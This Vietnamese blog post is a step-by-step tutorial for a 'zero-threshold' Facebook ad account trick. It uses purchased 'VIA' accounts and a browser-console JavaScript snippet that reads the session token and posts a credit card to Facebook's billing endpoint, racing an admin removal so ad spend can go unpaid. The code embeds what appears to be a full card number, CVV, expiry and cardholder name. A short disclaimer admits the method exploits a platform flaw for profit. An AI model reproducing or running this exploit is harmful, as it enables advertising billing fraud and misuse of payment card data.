TUT 0 ngưỡng Update ngày 13/10/2023

tut không ngưỡng

TUT 0 ngưỡng Update ngày 13/10/2022:

Nguyên liệu: VIA như hình Tài khoản giao diện như hình.

– Add Paypal

– Add cả thẻ phụ để còn cắn tiền

– Xong hủy liên kết Paypal

– Mở đồng thời 2 Tab VIA gốc ( như ảnh ) và VIA phụ

– Share TKQC VIA gốc cho VIA phụ

– Thao tác trên VIA phụ TKQC của VIA gốc muốn làm 0 ngưỡng

– Add thẻ bằng Code -> Enter ở Tab VIA phụ đồng thời ở Tab VIA chính xoá QTV VIA phụ ra

– Kiểm tra thành quả.

Code thêm thẻ vào TKQC – B1: Truy cập : https://business.facebook.com/ads/manager/account_settings/account_billing/?act=944575722988272&pid=p1&page=account_settings&tab=account_billing_settings

B2: F12 -> Console

Lấy code ở đây:

let token = require(“DTSGInitialData”).token || document.querySelector(‘[name=”fb_dtsg”]’).value, uid = require(“CurrentUserInitialData”).USER_ID || [removed].match(/c_user=([0-9]+)/)[1], accountId = require(“BusinessUnifiedNavigationContext”).adAccountID, account_holder_name = “Đào Anh Tuấn” credit_card_number = “5438962420571574” csc = “247” expiry_month = “03” expiry_year = “2025” credit_card_first_6 = credit_card_number.substring(0, 6) credit_card_last_4 = credit_card_number.substring(credit_card_number.length – 4) fetch(“https://business.secure.facebook.com/ajax/payment/token_proxy.php?tpe=%2Fapi%2Fgraphql%2F“, { headers: { “content-type”: “application/x-www-form-urlencoded”, “x-fb-friendly-name”: “useBillingAddCreditCardMutation” }, referrer: “https://www.business.facebook.com/“, body: av=${uid}&payment_dev_cycle=prod&__usid=&__user=${uid}&__a=1&__dyn=&__req=1d&__hs=19052.BP%3Aads_campaign_manager_pkg.2.0.0.0.&dpr=1&__ccg=UNKNOWN&__rev=1005130120&__s=m3nwoo%3Ahk1830%3A8jyqhz&__hsi=7070146181357455798-0&__comet_req=0&fb_dtsg=${token}&jazoest=21981&lsd=FNrxnrWZ79fwVUhEKI7Bg7&__spin_r=1005130120&__spin_b=trunk&__spin_t=1646146685&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=useBillingAddCreditCardMutation&variables=%7B%22input%22%3A%7B%22billing_address%22%3A%7B%22country_code%22%3A%22VN%22%7D%2C%22billing_logging_data%22%3A%7B%22logging_counter%22%3A14%2C%22logging_id%22%3A%22478093535%22%7D%2C%22cardholder_name%22%3A%22${account_holder_name}%22%2C%22credit_card_first_6%22%3A%7B%22sensitive_string_value%22%3A%22${credit_card_first_6}%22%7D%2C%22credit_card_last_4%22%3A%7B%22sensitive_string_value%22%3A%22${credit_card_last_4}%22%7D%2C%22credit_card_number%22%3A%7B%22sensitive_string_value%22%3A%22${credit_card_number}%22%7D%2C%22csc%22%3A%7B%22sensitive_string_value%22%3A%22${csc}%22%7D%2C%22expiry_month%22%3A%22${expiry_month}%22%2C%22expiry_year%22%3A%22${expiry_year}%22%2C%22payment_account_id%22%3A%22${accountId}%22%2C%22payment_type%22%3A%22MOR_ADS_INVOICE%22%2C%22unified_payments_api%22%3Atrue%2C%22actor_id%22%3A%22${uid}%22%2C%22client_mutation_id%22%3A%221%22%7D%7D&server_timestamps=true&doc_id=4126726757375265, method: “POST”, mode: “cors”, credentials: “include” }).then(response => response.json()).then(data => { console.log(“Done”); console.log(data); })

Nhớ thay thông tin thẻ nha các Sếp!

Tut là lợi dụng sơ hở của nền tảng để trục lợi. Chúng tôi không cổ vũ hành vi này, chúng tôi đăng lên để nền tảng biết mà update , tạo môi trường cạnh tranh lành mạnh cho các nhà bán hàng, người kinh doanh và nhà quảng cáo trên nền tảng Facebook!!

Có thể bạn thích:  Làm thế nào để thiết lập sự kiện tiêu chuẩn cho Meta Pixel tốt nhất?

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *